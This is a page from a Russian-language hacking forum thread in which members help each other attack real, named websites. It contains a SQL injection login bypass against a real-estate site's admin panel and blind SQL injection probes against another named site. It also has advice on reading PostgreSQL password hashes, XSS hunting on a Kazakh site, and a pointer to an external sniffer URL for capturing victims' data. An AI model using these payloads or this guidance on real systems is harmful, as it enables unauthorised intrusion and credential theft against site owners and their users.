Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    может пасс ********?
     
    1 person likes this.
  2. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    Нет, там у всех так пасс выглядит, а когда я запрос составил чтоб пароль в др ячейку копировать то база сказала что не может копировать поле hide в text
    т.е. пароли имеют тип hide
     
  3. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    2 truelamer
    Ты просто неудачную таблицу выбрал. В ней нет паролей ,что-то типа файла passwd в unix
    Если точнее, то системная таблица с информацией о юзерах
    P.S но версия Piflit мне тоже понравилась :D
     
    #1163 Kakoytoxaker, 10 Mar 2008
    Last edited: 10 Mar 2008
  4. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    это тебе надо в pg_shadow лезть, но не факт что прав хватит
     
    1 person likes this.
  5. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    А точнее-факт ,что не хватит. Там куча других данных и возможностей,смотря какая цель
     
  6. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    Цельбыла одна: научиться.

    Всем спасибо, всем плюсую.
     
  7. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    Скажите что такое выдает сканер NRG что за уязвимости такие или что это?
    Найдено: http://XXX.kz/?PageServices
    Найдено: http://XXX.kz/?wp-cs-dump
    Найдено: http://XXX.kz/?wp-html-rend
    Найдено: http://XXX.kz/?wp-stop-ver
    Найдено: http://XXX.kz/?wp-uncheckout
    Найдено: http://XXX.kz/?wp-usr-prop
    Найдено: http://XXX.kz/?wp-ver-diff
    Найдено: http://XXX.kz/?wp-verify-link
    Найдено: http://XXX.kz/?wp-ver-info

    перехожу по этим ссылкам ни чего не происходит
     
  8. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    http://agrealt.ru/admin/
    тут в админке sql я так понял что пароль пустое поле а login какой? что то там запросы не составляются или я что то не правильно делаю
     
  9. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Table 'realto_base.users' doesn't exist
    =\
     
  10. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    ага

    SELECT user_id FROM realto_base.users WHERE LOWER(user_login)="1" or 1=1/*" AND LOWER(user_pwd)="c1562365960602e0b66d39995ec882cf";
    Table 'realto_base.users' doesn't exist

    сталобыть кто-то похерил админку, или админы кривые
     
    1 person likes this.
  11. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    Вем спасибо всем плюсую)))

    ЗЫ: думал что туплю
     
  12. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    Помогите разобраться есть ли тут пассивная XSS или нет, что ни пробую не получается
    http://nkregion.kz/index.php?IDAdmin=test
     
  13. Horsekiller

    Horsekiller Elder - Старейшина

    Joined:
    22 Nov 2006
    Messages:
    61
    Likes Received:
    33
    Reputations:
    6
    CuteNews там, врядли найдешь ХСС просто так.
    Багтраки почитай лучше, или в сорцы лезь.
     
  14. MaSter GeN

    MaSter GeN Elder - Старейшина

    Joined:
    26 Jan 2008
    Messages:
    52
    Likes Received:
    31
    Reputations:
    0
    Code:
    http://www.wingate.com/news.php?id=50'[/СODE]
    вроде есть скуль запросы типа выдают одну и ту же страницу 
    [CODE]
    http://www.wingate.com/news.php?id=50-1
    http://www.wingate.com/news.php?id=49
    
    а с подзапросами что то странное твориться не одни не выполняться o_O
     
  15. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    как не выполняются?

    http://www.wingate.com/news.php?id=49%20and%20(select%201)=1

    5ый мускул
    http://www.wingate.com/news.php?id=49%20and%20substring(version(),1,1)=5
     
  16. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    это старые серверные уязвимости, не встречаются уже пару лет. даже не уязвимости, а фичи, показывающую инфу о серваке
     
    1 person likes this.
  17. MaSter GeN

    MaSter GeN Elder - Старейшина

    Joined:
    26 Jan 2008
    Messages:
    52
    Likes Received:
    31
    Reputations:
    0
    ой блин серьезно выполняються :)видать сокс чет прогнал :) спасибо )
     
  18. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    2 truelamer
    на сайте есть намек на ХСС и даже возможно актив (хотя тут как посмотреть)
    http://nkregion.kz/board/index.php?fid=3&id=18252
    Кликни на "Отправить письмо автору" там откроется окошко в котором ник, половина его нормальная а половина уже после тега курсив. Дальше не рыл.... просто не успел :)
     
    #1178 Red_Red1, 12 Mar 2008
    Last edited: 12 Mar 2008
  19. tick

    tick Elder - Старейшина

    Joined:
    10 Nov 2007
    Messages:
    35
    Likes Received:
    11
    Reputations:
    -12
    delete
     
    #1179 tick, 13 Mar 2008
    Last edited: 14 Mar 2008
  20. Lesnoy_chelovek

    Lesnoy_chelovek Elder - Старейшина

    Joined:
    6 Dec 2006
    Messages:
    224
    Likes Received:
    152
    Reputations:
    8
    Сниффер используй для перехвата данных.
    Можешь использовать этот сниффер: http://system32.name/sniff/log.php
     
Thread Status:
Not open for further replies.